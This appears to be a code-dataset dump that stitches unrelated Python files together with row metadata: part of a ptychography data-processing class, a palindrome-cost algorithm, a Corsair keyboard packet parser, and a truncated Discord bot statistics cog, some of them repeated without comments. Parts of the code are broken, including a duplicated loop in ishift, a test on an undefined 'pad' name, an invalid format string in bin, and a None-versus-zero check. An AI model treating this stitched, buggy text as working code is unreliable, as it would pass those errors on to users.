l[i][xstart // 1:xstop // 1, ystart //1: ystop //1] = arr
l[i] = self.shift(l[i], dx, dy)
self.data = l
@staticmethod
def inner_product(u, v):
return sp.sum((conj(u)*v).data[0])/(u.data[0].shape[0]*u.data[0].shape[1])
@staticmethod
def proj_u_v(u, v):
return u*(CXData.inner_product(v, u)/CXData.inner_product(u, u))
def max(self):
"""
Return a list of maximum (absolute) value(s) of (complex) array(s).
"""
if len(self.data)==1:
return abs(self.data[0]).max()
else:
return [abs(element).max() for element in self.data]
def min(self):
"""
Return a list of minimum (absolute) value(s) of (complex) array(s).
"""
if len(self.data)==1:
return abs(self.data[0]).min()
else:
return [abs(element).min() for element in self.data]
def normalise(self, val=1.):
"""
Rebase data from 0 to 1.
"""
if CXP.reconstruction.verbose:
CXP.log.info('Rebasing data from 0 to {:3.2f}'.format(val))
for i in xrange(len(self.data)):
self.data[i] -= abs(self.data[i]).min()
self.data[i] /= abs(self.data[i]).max()
self.data[i] *= val
def append(self, other):
if isinstance(other, CXData):
for data in other.data:
self.data.append(data)
elif isinstance(other, np.ndarray):
self.data.append(other)
def square_root(self):
if CXP.reconstruction.verbose:
CXP.log.info('Taking square root.')
for i in xrange(len(self.data)):
self.data[i] = pow(self.data[i], 0.5)
def fft_shift(self):
if CXP.reconstruction.verbose:
CXP.log.info('Performing FFT shift.')
for i in xrange(len(self.data)):
self.data[i] = spf.fftshift(self.data[i])
def len(self):
return len(self.data)
@staticmethod
def shift_inner(arr, nx, ny, window=False, padding='reflect'):
"""
Shifts an array by nx and ny respectively.
"""
if ((nx % 1. == 0.) and (ny % 1. ==0)):
return sp.roll(sp.roll(arr, int(ny), axis=0),
int(nx), axis=1)
else:
atype = arr.dtype
if padding:
x, y = arr.shape
pwx, pwy = int(pow(2., np.ceil(np.log2(1.5*arr.shape[0])))), int(pow(2., np.ceil(np.log2(1.5*arr.shape[1]))))
pwx2, pwy2 = (pwx-x)/2, (pwy-y)/2
if pad=='zero':
arr = pad.with_constant(arr, pad_width=((pwx2, pwx2), (pwy2, pwy2)))
else:
arr = pad.with_reflect(arr, pad_width=((pwx2, pwx2), (pwy2, pwy2)))
phaseFactor = sp.exp(complex(0., -2.*sp.pi)*(ny*spf.fftfreq(arr.shape[0])[:, np.newaxis]+nx*spf.fftfreq(arr.shape[1])[np.newaxis, :]))
if window:
window = spf.fftshift(CXData._tukeywin(arr.shape[0], alpha=0.35))
arr = spf.ifft2(spf.fft2(arr)*phaseFactor*window)
else:
arr = spf.ifft2(spf.fft2(arr)*phaseFactor)
if padding:
arr = arr[pwx/4:3*pwx/4, pwy/4:3*pwy/4]
if atype == 'complex':
return arr
else:
return np.real(arr)
@staticmethod
def shift(x, nx, ny, **kwargs):
if isinstance(x, CXData):
l=[]
for data in x.data:
l.append(CXData.shift_inner(data.copy(), nx, ny, **kwargs))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return CXData.shift_inner(x, nx, ny)
def ishift(self, nx, ny, **kwargs):
# Inplace version of shift
l=[]
for data in self.data:
for data in self.data:
l.append(self.shift_inner(data.copy(), nx, ny, kwargs))
self.data = l
return self
def rot90(self, i):
# Rotate by 90 degrees i times
if CXP.reconstruction.verbose:
CXP.log.info('Rotating data by {:d}'.format(i*90))
for j, data in enumerate(self.data):
self.data[j] = sp.rot90(data, i)
def find_dead_pixels(self):
# Return coordinates of pixels with a standard deviation of zero
dead_pix = sp.where(abs(np.std(self.data, axis=0))<machine_precision)
if CXP.reconstruction.verbose:
CXP.log.info('Found {0:d} dead pixels'.format(len(dead_pix)))
return dead_pix
def zero_dead_pixels(self):
if CXP.reconstruction.verbose:
CXP.log.info('Setting dead pixels to zero')
self.data[self.find_dead_pixels()]=0.
def threshhold(self, threshhold=None):
if not threshhold:
threshhold = CXP.preprocessing.threshhold_raw_data
if CXP.reconstruction.verbose:
CXP.log.info('Applying threshhold to data at {:3.2f} and rebasing to 0.'.format(threshhold))
for i, data in enumerate(self.data):
tdata = sp.where(data<threshhold, threshhold, data)
tdata-=tdata.min()
self.data[i]=tdata
def symmetrize_array_shape(self, qxqy0=None, desired_shape=None):
x0, y0 = self.data[0].shape
if desired_shape is None:
desired_shape = CXP.preprocessing.desired_array_shape
if qxqy0 is None:
qx, qy = CXP.preprocessing.qx0qy0
else:
qx, qy = qxqy0
if CXP.reconstruction.verbose:
CXP.log.info('Symmetrizing array shape.\n\tCurrent shape:\t{}x{}\n\tNew shape:\t{}x{}\n\tCentred on:\t{},{}'.format(
x0, y0, desired_shape, desired_shape, qx, qy))
# Cropping or padding?
qx_lower, qx_upper = qx-desired_shape/2, qx+desired_shape/2
qy_lower, qy_upper = qy-desired_shape/2, qy+desired_shape/2
if qx_lower<0: # Crop
nxl, mxl = np.abs(qx_lower), 0
else: # Pad
nxl, mxl = 0, qx_lower
if qy_lower<0: # Crop
nyl, myl = np.abs(qy_lower), 0
else: # Pad
nyl, myl = 0, qy_lower
if qx_upper<x0: # Crop
nxu, mxu = desired_shape, qx+desired_shape/2
else: # Pad
nxu, mxu = x0-qx_lower, x0
if qy_upper<y0: # Crop
nyu, myu = desired_shape, qy+desired_shape/2
else: # Pad
nyu, myu = y0-qy_lower, y0
for i in range(len(self.data)):
tmp = sp.zeros((desired_shape, desired_shape))
tmp[nxl:nxu, nyl:nyu] = self.data[i][mxl:mxu, myl:myu]
self.data[i] = tmp
CXP.p = CXP.preprocessing.desired_array_shape
def treat_beamstop(self):
factor = CXP.measurement.beam_stop_factor.keys()[0]
x0, y0 = CXP.measurement.beam_stop_factor[factor][0]
x1, y1 = CXP.measurement.beam_stop_factor[factor][1]
for i in range(len(self.data)):
self.data[i][x0:x1, y0:y1]*=factor
def save(self, path=None):
if path:
filepath = path
else:
filepath = self.savepath
try:
CXP.log.info('Saving {} to:\n\t{}'.format(self.name, filepath))
except AttributeError:
CXP.log.info('Saving to:\n\t{}'.format(filepath))
try:
np.savez(filepath, *self.data)
except IOError as e:
CXP.log.error(e)
raise Exception('Could not save {} to {}'.format(self.kwargs['name'], path))
def load(self, path=None):
if path:
filepath = path
else:
filepath = self.filename
CXP.log.info('Loading data from:\n\t{}'.format(filepath))
try:
self.data = self.openup(filepath)
except IOError as e:
CXP.log.error(e)
raise Exception('Could not load file from {}'.format(filepath))
if not isinstance(self.data, list):
self.data = [self.data]
def init_data(self, *args, **kwargs):
if args[0] == 'det_mod':
if CXP.actions.preprocess_data:
self.read_in_data()
else:
self.load()
elif args[0] == 'probe_det_mod':
if CXP.actions.preprocess_data:
# Get list of white files
CXP.log.info('Preprocessing probe detector modulus.')
if CXP.io.whitefield_filename not in [None, '']: # If whitefields were measured
wfilename, wfilerange, wn_acqs = [CXP.io.whitefield_filename, CXP.io.whitefield_filename_range,
CXP.measurement.n_acqs_whitefield]
self.pattern = wfilename.count('{')
if self.pattern == 1:
wf = [wfilename.format(i) for i in range(wfilerange[0], wfilerange[1])]
elif self.pattern == 2:
wf = [wfilename.format(wfilerange[0], i) for i in range(wn_acqs)]
elif self.pattern == 3:
wf = glob.glob(wfilename.split('}')[0]+'}*')
res = self.preprocess_data_stack(0, 1, wf, self.pattern, None, None, no_decorate=True)
self.data = res[1]
else: #Guesstimate the whitefield from the average of the diffraction patterns
pass
else:
self.load(CXData.raw_data_filename_string.format('probe_det_mod'))
try:
probe = self.__class__.__all__['probe']
probe.data[0] = spf.ifft2(self.data[0]*exp(complex(0., 1.)*sp.angle(spf.fft2(probe.data[0]))))
CXP.log.info('Applied probe modulus constraint.')
except (AttributeError, KeyError):
pass
elif args[0] == 'dark':
if CXP.actions.preprocess_data:
# Get list of dark files
CXP.log.info('Preprocessing darkfield.')
dfilename, dfilerange, dn_acqs = [CXP.io.darkfield_filename, CXP.io.darkfield_filename_range,
CXP.measurement.n_acqs_darkfield]
self.pattern = dfilename.count('{')
if self.pattern == 1:
df = [dfilename.format(i) for i in range(dfilerange[0], dfilerange[1])]
elif self.pattern == 2:
df = [dfilename.format(dfilerange[0], i) for i in range(dn_acqs)]
elif self.pattern == 3:
df = glob.glob(dfilename.split('}')[0]+'}*')
res = self.preprocess_data_stack(0, 1, df, self.pattern, None, None, no_decorate=True)
self.data = res[1]
else:
self.load(CXData.raw_data_filename_string.format('probe_det_mod'))
def read_in_data(self):
self.completed_filenames = [] # Keep track of what's been processed already for online analysis
self.job_filenames = []
self.pattern = None
CXP.log.info('Reading in & preprocessing raw data...')
if self.pattern is None:
filename, filerange, n_acqs = [CXP.io.data_filename, CXP.io.data_filename_range, CXP.measurement.n_acqs_data]
self.pattern = filename.count('{')
CXP.log.info('Detected filename pattern: {:d}'.format(self.pattern))
if self.pattern == 0:
raise Exception('NamingConventionError:\nPlease read CXParams for more info on file naming conventions.')
try:
n0, n1 = filerange[0], filerange[1]+1
except IndexError:
n0 = n1 = filerange[0]
if CXP.io.darkfield_filename is not '':
try:
dark = self.__class__.__all__['dark']
CXP.log.info('Found darkfield.')
except KeyError:
dark = CXData(itype='dark')
dark.save()
else:
CXP.log.info('Not processing darkfields.')
dark = None
if CXP.io.whitefield_filename is not '':
try:
probe_det_mod = self.__class__.__all__['probe_det_mod']
CXP.log.info('Found probe detector modulus.')
except KeyError:
probe_det_mod = CXData(itype='probe_det_mod')
probe_det_mod.save()
else:
CXP.log.info('Not processing whitefields.')
probe_det_mod = None
old_verbosity = CXP.reconstruction.verbose
CXP.reconstruction.verbose = False
jobs = mp.JoinableQueue()
results = mp.Queue()
n_processes = mp.cpu_count()
then = time.time()
cnt=0
missing_frames = False
l=[]
CXP.log.info('Dividing raw data into jobs over {:d} processes.'.format(n_processes))
for i in range(n0, n1):
if self.pattern == 1:
s = [filename.format(i)]
else:
s = glob.glob((filename.split('}')[0]+'}*').format(i))
# s = [fn for fn in s if fn not in self.completed_filenames]
if len(s)==0:
CXP.log.error('Globbed 0 files in CXData@read_in_files')
sys.exit(1)
if self.pattern==1:
try:
s=s[0]
self.completed_filenames.append(s)
if cnt<n_acqs:
l.append(s)
cnt+=1
if cnt>=n_acqs:
self.job_filenames.append(l)
cnt=0
l=[]
except IndexError:
missing_frames = True
CXP.log.error('Missing frame: {:s}'.format(filename.format(i)))
else:
self.completed_filenames+=s
self.job_filenames.append(s)
if missing_frames:
print "There were missing frames. Choose 'c' to continue or 'q' to quit."
pdb.set_trace()
p = [mp.Process(target=self.preprocess_data_stack, args=(jobs, results))
for i in range(n_processes)]
for process in p:
process.start()
n_jobs = len(self.job_filenames)
for i in range(n_jobs):
jobs.put((i, n_jobs, self.job_filenames[i], self.pattern, probe_det_mod, dark))
# Add Poison Pill
for i in range(n_processes):
jobs.put((None, None, None, None, None, None))
CXP.log.info('{:3.2f} seconds elapsed dividing jobs between processes.'.format(time.time()-then))
then = time.time()
cnt = 0
self.data = [None]*n_jobs
while True:
if not results.empty():
i, data = results.get()
self.data[i] = data[0]
cnt+=1
elif cnt==n_jobs:
break
jobs.join()
jobs.close()
results.close()
for process in p:
process.join()
CXP.log.info('{:3.2f} seconds elapsed preprocessing data.'.format(time.time()-then))
CXP.reconstruction.verbose = old_verbosity
#self._sequence_dir = '/'.join([CXP.io.base_dir, CXP.io.scan_id, 'sequences'])
#self._cur_sequence_dir = self._sequence_dir+'/sequence_{:d}'.format(CXP.reconstruction.sequence)
#self.save(path=self._cur_sequence_dir+'/det_mod.npy')
@worker
def preprocess_data_stack(self, stack_num, n_jobs, file_list, pattern, white, dark):
# Average, merge and preprocess a stack of images
# Typically a stack corresponds to one ptychographic position
l=[]
tmp=None
# First - average according to the pattern
if pattern in [1, 2]:
# Averaging only
for filename in file_list:
if tmp is None:
tmp = self.openup(filename)
else:
tmp += self.openup(filename)
l.append(tmp/len(file_list))
elif pattern == 3:
# Average then merge
d={}
unique_times = list(set([t.split('_')[3] for t in file_list]))
for filename in file_list:
t = filename.split('.')[0].split('_')[-1]
if t not in d.keys():
d[t] = (1, self.openup(filename))
else:
d[t][0] += 1
d[t][1] += self.openup(filename)
for key, (i, val) in d.iteritems():
val /= i
# Check for saturated values and merge variable exposure times
max_time = max(unique_times)
if CXP.preprocessing.saturation_level>0:
for key in d.keys():
wh = sp.where(d[key]>=CXP.preprocessing.saturation_level)
d[key][wh] = 0
if tmp == 0:
tmp = d[key] * max_time/float(key)
else:
tmp += d[key] * max_time/float(key)
l.append(tmp)
else:
raise Exception('NamingConventionError')
# Do preprocessing
data = CXData()
data.data = l
if CXP.measurement.beam_stop:
data.treat_beamstop()
data.symmetrize_array_shape()
# CCD Specific Preprocessing
if CXP.preprocessing.detector_type == 'ccd':
try:
# Dark field correction
if dark is not None:
print('Dark field correcting data')
data-=dark
# Dark correct white field
if white is not None:
print('Dark field correcting whitefield')
white-=dark
except UnboundLocalError:
print('No darkfield subtraction performed.')
# PAD Specific Preprocessing
elif CXP.preprocessing.detector_type == 'pad':
pass
# Threshhold data
if CXP.preprocessing.threshhold_raw_data > 0:
data.threshhold()
if white is not None:
white.threshhold()
# Bin data
if CXP.preprocessing.bin > 1:
data.bin()
if white is not None:
white.bin()
if CXP.preprocessing.rot90!=0:
data.rot90(CXP.preprocessing.rot90)
if white is not None:
white.rot90(CXP.preprocessing.rot90)
# Take square root
data.square_root()
if white is not None:
white.square_root()
# Put in FFT shifted
data.fft_shift()
if white is not None:
white.fft_shift()
return (stack_num, data.data)
def bin(self, n=None):
"""
Bin a square array by grouping nxn pixels.
Array size must be a multiple of n.
"""
if n is None:
n=CXP.preprocessing.bin
# Now the detector pixel size has changed so we should update that
CXP.experiment.dx_d *= n
CXP.log.info('After binning new detector pixel size: {2.2e}'.format(CXP.experiment.dx_d))
nx, ny = self.data[0].shape[0], self.data[0].shape[1]
if not nx==ny:
raise Exception('Array to be binned must be square')
if not sp.mod(nx, n)==0.:
raise Exception('Array size must be a multiple of binning factor')
if n>nx:
raise Exception('Binning factor must be smaller than array size')
nn = nx/n
l = []
for i in xrange(len(self.data)):
tmp = sp.zeros((nn, nn))
for p in xrange(nn):
for q in xrange(nn):
tmp[p, q] = sp.sum(self.data[i][p*n:(p+1)*n, q*n:(q+1)*n])
l.append(tmp)
self.data=l
def show(self, i=0, phase=False, log=False):
if phase:
pylab.matshow(angle(self.data[i]), cmap=cm.hsv)
else:
if log:
pylab.matshow(sp.log10(abs(self.data[i])))
else:
pylab.matshow(abs(self.data[i]))
pylab.colorbar()
pylab.show()
def plot(self, i=0, phase=False):
pylab.figure()
if phase:
pylab.plot(np.angle(self.data[i][:, self.data[i].shape[0]/2]), label='Horizontal')
pylab.plot(np.angle(self.data[i][self.data[i].shape[1]/2, :]), label='Vertical')
else:
pylab.plot(np.abs(self.data[i][:, self.data[i].shape[0]/2]), label='Horizontal')
pylab.plot(np.abs(self.data[i][self.data[i].shape[1]/2, :]), label='Vertical')
pylab.legend()
def copy(self):
return CXData(data=[np.copy(arr) for arr in self.data])
class CXModal(object):
def __init__(self, *args, **kwargs):
self.modes = []
self.savepath = None
for kw in kwargs:
# Data attribute must be a list of arrays
if kw=='modes':
if isinstance(kwargs['modes'], list):
self.modes = kwargs['modes']
elif isinstance(kwargs['modes'], CXData):
self.modes = [kwargs['modes']]
else:
setattr(self, kw, kwargs[kw])
def __repr__(self):
try:
s=repr(self.modes[0].data[0])
except:
s=''
try:
return '<{} at {}>\n{:d} modes containing {:d} arrays ({:d}x{:d}px).\n{}'.format(self.__class__,
hex(id(self)), len(self.modes), len(self.modes[0]), self.modes[0].data[0].shape[0],
self.modes[0].data[0].shape[1], s)
except AttributeError:
return '<{} at {}>\nNo modes attribute present.'.format(self.__class__, hex(id(self)))
def __getitem__(self, s):
return self.modes[s]
def __setitem__(self, s, modes):
self.modes[s] = modes
@staticmethod
def _addsubmuldiv(operation, this, other):
if isinstance(other, CXModal):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other.modes[mode].data[i]) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
elif isinstance(other, CXData):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other.data[i]) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
elif isinstance(other, (int, float, complex)):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
@staticmethod
def _iaddsubmuldiv(operation, this, other):
if isinstance(other, CXModal):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i]=operation(this.modes[mode].data[i], other.modes[mode].data[i])
return this
elif isinstance(other, CXData):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i] = operation(this.modes[mode].data[i], other.data[i])
return this
elif isinstance(other, (int, float, complex)):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i] = operation(this.modes[mode].data[i], other)
return this
def __add__(self, other):
return CXModal._addsubmuldiv(operator.add, self, other)
def __radd__(self, other):
return CXModal._addsubmuldiv(operator.add, self, other)
def __iadd__(self, other):
return CXModal._iaddsubmuldiv(operator.iadd, self, other)
def __sub__(self, other):
return CXModal._addsubmuldiv(operator.sub, self, other)
def __rsub__(self, other):
return CXModal._addsubmuldiv(operator.sub, other, self)
def __isub__(self, other):
return CXModal._iaddsubmuldiv(operator.isub, self, other)
def __mul__(self, other):
return CXModal._addsubmuldiv(operator.mul, self, other)
def __rmul__(self, other):
return CXModal._addsubmuldiv(operator.mul, self, other)
def __imul__(self, other):
return CXModal._addsubmuldiv(operator.imul, self, other)
def __div__(self, other):
return CXModal._addsubmuldiv(operator.div, self, other)
def __rdiv__(self, other):
return CXModal._addsubmuldiv(operator.div, self, other)
def __idiv__(self, other):
return CXModal._addsubmuldiv(operator.idiv, self, other)
def __pow__(self, power):
return CXModal(modes=[self.modes[mode]**power for mode in range(len(self.modes))])
def __len__(self):
return len(self.modes)
def copy(self):
return CXModal(modes=[self.modes[mode].copy() for mode in range(len(self))])
@staticmethod
def modal_sum(modal):
return CXData(data=[ reduce(CXData.__add__, [ modal[mode][i] for mode in range(len(modal.modes)) ]).data[0] for i in range(len(modal[0].data))])
def getat(self, i):
"""
.. method::setat(self, i)
return all modes at position i
"""
return CXModal(modes=[self.modes[mode][i] for mode in range(len(self))])
def setat(self, i, modal):
"""
.. method::getat(self, i)
set all modes at position i
"""
for mode in range(len(self)):
self.modes[mode][i] = modal.modes[mode][0]
def normalise(self):
mode_sum_max = CXModal.modal_sum(abs(self)).data[0].max()
for mode in range(len(self)):
self.modes[mode] /= mode_sum_max
def orthogonalise(self):
ortho = CXModal(modes=self[0][0].copy())
for i in range(1, len(self)):
tmp = self[i][0].copy()
for j in range(i-1, -1, -1):
tmp -= CXData.proj_u_v(ortho[j][0], self[i][0])
ortho.modes.append(tmp)
return CXModal(modes=ortho.modes) | false | true |
f723238c03a819b00d08d86a7b7c1d5463e89447 | 1,238 | py | Python | O(n) on array/change_min.py | boristown/leetcode | 2e510b7913653da75cd9d10f1adce4c466e74768 | [
"MIT"
] | 1 | 2021-10-04T03:09:51.000Z | 2021-10-04T03:09:51.000Z | O(n) on array/change_min.py | boristown/leetcode | 2e510b7913653da75cd9d10f1adce4c466e74768 | [
"MIT"
] | null | null | null | O(n) on array/change_min.py | boristown/leetcode | 2e510b7913653da75cd9d10f1adce4c466e74768 | [
"MIT"
] | null | null | null | def change_min_palindrome(s,que):
'''
# 在区间内更改最少的元素,使得它不包含长度2以上的回文
# 输入包括一系列区间查询,输出变更区间的最小成本
# 字符串只含有a,b,c
#https://codeforces.com/problemset/problem/1555/D
#*1600
#输入:
s:字符串
que:查询序列,每个查询为(l,r)表示区间范围,坐标从1开始
#返回:
ans:每个查询的答案
'''
#分析
#由于不能包含长度2以上的回文,且只有三种字符
#推测可能只存在不超过10种合理的排列方式
#试着构造这样的排列:
#长度1:a / b / c
#长度2:ab / ac / ba / bc / ca / cb
#长度3:abc / acb / bac / bca / cab / cba
#长度4:abca / acba / bacb / bcab / cabc / cbac
#长度5:abcab / acbac / bacba / bcabc / cabca / cbacb
#可以看出对于大于1的每一种长度,都只存在6种合理的排列
#1 暴力解法:
# 对比区间与6种排列,分别计算成本
# 每次查询的时间复杂度为O(n)
# 总时间复杂度为O(m*n)
# 肯定超时
#2 前缀优化:
# 分别使用6种排列方式扫描原字符串
# 并使用前缀pre[k][i]记录第k种排列方式扫描到第i个字符时的成本
# 初始化时间复杂度:O(n)
# 每次查询的时间复杂度:O(1)
# 肯定通过
pat = ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
n = len(s)
pre = [[0]*(n+1) for _ in range(6)]
for k in range(6):
for i in range(n):
pre[k][i+1]=pre[k][i]
if s[i] != pat[k][i%3]:
pre[k][i+1]+=1
ans = []
for l,r in que:
a = float("inf")
for k in range(6):
a = min(a,pre[k][r]-pre[k][l-1])
ans.append(a)
return ans | 25.265306 | 54 | 0.518578 | def change_min_palindrome(s,que):
pat = ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
n = len(s)
pre = [[0]*(n+1) for _ in range(6)]
for k in range(6):
for i in range(n):
pre[k][i+1]=pre[k][i]
if s[i] != pat[k][i%3]:
pre[k][i+1]+=1
ans = []
for l,r in que:
a = float("inf")
for k in range(6):
a = min(a,pre[k][r]-pre[k][l-1])
ans.append(a)
return ans | true | true |
f723267e938751b84d6d2db92446189b8c043af8 | 2,178 | py | Python | 0e01.py | ZirconiumX/corsair-re | 9487fec931b262a013fb7fee3eaf90d6e67967ad | [
"MIT"
] | 7 | 2017-11-25T19:16:01.000Z | 2019-07-24T01:29:39.000Z | 0e01.py | Ravenslofty/corsair-re | 9487fec931b262a013fb7fee3eaf90d6e67967ad | [
"MIT"
] | 3 | 2018-02-07T07:13:21.000Z | 2019-06-25T20:35:45.000Z | 0e01.py | Ravenslofty/corsair-re | 9487fec931b262a013fb7fee3eaf90d6e67967ad | [
"MIT"
] | 2 | 2018-01-02T10:46:48.000Z | 2018-02-07T04:27:30.000Z | #!/usr/bin/python3
devices = {0x40: "K63",
0x17: "K65 RGB",
0x07: "K65",
0x37: "K65 LUX RGB",
0x39: "K65 RAPIDFIRE",
0x3f: "K68 RGB",
0x13: "K70 RGB",
0x09: "K70",
0x33: "K70 LUX RGB",
0x36: "K70 LUX",
0x48: "K70 RGB MK.2",
0x38: "K70 RAPIDFIRE RGB",
0x3a: "K70 RAPIDFIRE",
0x11: "K95 RGB",
0x08: "K95",
0x2d: "K95 PLATINUM RGB",
0x20: "STRAFE RGB",
0x49: "STRAFE RGB MK.2",
0x15: "STRAFE",
0x44: "STRAFE",
0x12: "M65 RGB",
0x2e: "M65 PRO RGB",
0x14: "SABRE RGB", # Optical
0x19: "SABRE RGB", # Laser
0x2f: "SABRE RGB", # New?
0x32: "SABRE RGB", # Alternate
0x1e: "SCIMITAR RGB",
0x3e: "SCIMITAR PRO RGB",
0x3c: "HARPOON RGB",
0x34: "GLAIVE RGB",
0x3d: "K55 RGB",
0x22: "KATAR",
0x3b: "MM800 RGB POLARIS",
0x2a: "VOID RGB"}
packet = [int("0x" + s, 16) for s in input().split(" ")]
if packet[0] != 0x0e or packet[1] != 0x01:
print("Not a valid init packet.")
exit(1)
# packet[2] and [3] are ignored
# packets 5 to 7 are unknown
print("Firmware: %d.%d%d" % (packet[9], (packet[8] & 0xF0) >> 4, (packet[8] & 0x0F)))
print("Bootloader: %d%d" % (packet[11], packet[10]))
print("Vendor: %x%x" % (packet[13], packet[12]))
print("Product: %x%x (%s)" % (packet[15], packet[14], devices[packet[14]]))
print("Poll rate: %dms" % (packet[16]))
# packets 17 to 19 are unknown
if packet[20] == 0xc0:
print("Type: Keyboard")
print("Layout: ", end='')
layouts = [
"ANSI",
"ISO",
"ABNT",
"JIS",
"Dubeolsik"
]
print(layouts[packet[23]])
elif packet[20] == 0xc1:
print("Type: Mouse")
print("Lighting zones: ", end='')
for i in range(8):
if (1 << i) & packet[24]:
print("%d " % i, end='')
print()
elif packet[20] == 0xc2:
print("Type: Mousepad")
else:
print("Type: Unknown")
| 26.560976 | 85 | 0.470615 |
devices = {0x40: "K63",
0x17: "K65 RGB",
0x07: "K65",
0x37: "K65 LUX RGB",
0x39: "K65 RAPIDFIRE",
0x3f: "K68 RGB",
0x13: "K70 RGB",
0x09: "K70",
0x33: "K70 LUX RGB",
0x36: "K70 LUX",
0x48: "K70 RGB MK.2",
0x38: "K70 RAPIDFIRE RGB",
0x3a: "K70 RAPIDFIRE",
0x11: "K95 RGB",
0x08: "K95",
0x2d: "K95 PLATINUM RGB",
0x20: "STRAFE RGB",
0x49: "STRAFE RGB MK.2",
0x15: "STRAFE",
0x44: "STRAFE",
0x12: "M65 RGB",
0x2e: "M65 PRO RGB",
0x14: "SABRE RGB",
0x19: "SABRE RGB",
0x2f: "SABRE RGB",
0x32: "SABRE RGB",
0x1e: "SCIMITAR RGB",
0x3e: "SCIMITAR PRO RGB",
0x3c: "HARPOON RGB",
0x34: "GLAIVE RGB",
0x3d: "K55 RGB",
0x22: "KATAR",
0x3b: "MM800 RGB POLARIS",
0x2a: "VOID RGB"}
packet = [int("0x" + s, 16) for s in input().split(" ")]
if packet[0] != 0x0e or packet[1] != 0x01:
print("Not a valid init packet.")
exit(1)
print("Firmware: %d.%d%d" % (packet[9], (packet[8] & 0xF0) >> 4, (packet[8] & 0x0F)))
print("Bootloader: %d%d" % (packet[11], packet[10]))
print("Vendor: %x%x" % (packet[13], packet[12]))
print("Product: %x%x (%s)" % (packet[15], packet[14], devices[packet[14]]))
print("Poll rate: %dms" % (packet[16]))
if packet[20] == 0xc0:
print("Type: Keyboard")
print("Layout: ", end='')
layouts = [
"ANSI",
"ISO",
"ABNT",
"JIS",
"Dubeolsik"
]
print(layouts[packet[23]])
elif packet[20] == 0xc1:
print("Type: Mouse")
print("Lighting zones: ", end='')
for i in range(8):
if (1 << i) & packet[24]:
print("%d " % i, end='')
print()
elif packet[20] == 0xc2:
print("Type: Mousepad")
else:
print("Type: Unknown")
| true | true |
f72328b4c20a9cd0d89dcd30e484ba7da76bb603 | 2,643 | py | Python | cogs/statistics.py | Tesshin/CS-Pound | 8e40f3a144aa6578e87d30aba0d43cb51756ecdf | [
"MIT"
] | null | null | null | cogs/statistics.py | Tesshin/CS-Pound | 8e40f3a144aa6578e87d30aba0d43cb51756ecdf | [
"MIT"
] | null | null | null | cogs/statistics.py | Tesshin/CS-Pound | 8e40f3a144aa6578e87d30aba0d43cb51756ecdf | [
"MIT"
] | null | null | null | from datetime import datetime
import os
import platform
import sys
import time
import discord
from discord.ext import commands
import psutil
from constants import Constants
from library import resolver
start_time = datetime.now() # The time the script started running
class Statistics(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=["stats"])
@commands.guild_only()
async def statistics(self, ctx):
if ctx.invoked_subcommand is None:
bot_id = self.bot.user.id
python_version = f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}"
discord_py_version = f"{discord.__version__}"
bot_version = f"{Constants.version}"
operating_system = f"{platform.system()}"
guild_count = f"{len(self.bot.guilds)} guilds"
cpu_percent = f"{psutil.cpu_percent()}%"
memory_percent = f"{psutil.virtual_memory().percent}%"
bot_memory = (
f"{round(psutil.Process(os.getpid()).memory_info().rss / 1024**2)} MB"
)
cogs_loaded = f"{len(self.bot.cogs)} commands loaded"
ping = f"{round(self.bot.latency * 1000)}ms"
bot_uptime = resolver(
(datetime.now() - start_time).total_seconds()
) # The time the bot (script) has been running
system_uptime = resolver(
round(time.time() - psutil.boot_time())
) # The time the system has been running
description = f"""`Created by Haru#5616. CS: haruyuki`
**Owner ID:** `{Constants.owner_id}`
**CS-Pound ID:** `{bot_id}`
**Running on:** `{guild_count}`
**OS:** `{operating_system}`
**Commands:** `{cogs_loaded}`
**Ping:** `{ping}`
**Python version:** `{python_version}`
**discord.py version:** `{discord_py_version}`
**CS-Pound version:** `{bot_version}`
**CPU usage:** `{cpu_percent}`
**Memory usage:** `{memory_percent}`
**CS-Pound memory usage:** `{bot_memory}`
**CS-Pound uptime:** `{bot_uptime}`
**System uptime:** `{system_uptime}`"""
embed = discord.Embed(
colour=0x4BA139, timestamp=datetime.utcnow()
) # Create empty embed
embed.set_footer(text="Requested")
embed.set_thumbnail(
url="https://www.chickensmoothie.com/Forum/images/avatars/gallery/Bunnies/0001-1.png"
)
embed.add_field(name="CS-Pound Stats", value=description)
await ctx.send(embed=embed) # Send embed
else:
pass
def setup(bot):
bot.add_cog(Statistics(bot))
| 31.843373 | 106 | 0.611805 | from datetime import datetime
import os
import platform
import sys
import time
import discord
from discord.ext import commands
import psutil
from constants import Constants
from library import resolver
start_time = datetime.now()
class Statistics(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=["stats"])
@commands.guild_only()
async def statistics(self, ctx):
if ctx.invoked_subcommand is None:
bot_id = self.bot.user.id
python_version = f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}"
discord_py_version = f"{discord.__version__}"
bot_version = f"{Constants.version}"
operating_system = f"{platform.system()}"
guild_count = f"{len(self.bot.guilds)} guilds"
cpu_percent = f"{psutil.cpu_percent()}%"
memory_percent = f"{psutil.virtual_memory().percent}%"
bot_memory = (
f"{round(psutil.Process(os.getpid()).memory_info().rss / 1024**2)} MB"
)
cogs_loaded = f"{len(self.bot.cogs)} commands loaded"
ping = f"{round(self.bot.latency * 1000)}ms"
bot_uptime = resolver(
(datetime.now() - start_time).total_seconds()
)
system_uptime = resolver(
round(time.time() - psutil.boot_time())
)
description = f"""`Created by Haru#5616. CS: haruyuki`
**Owner ID:** `{Constants.owner_id}`
**CS-Pound ID:** `{bot_id}`
**Running on:** `{guild_count}`
**OS:** `{operating_system}`
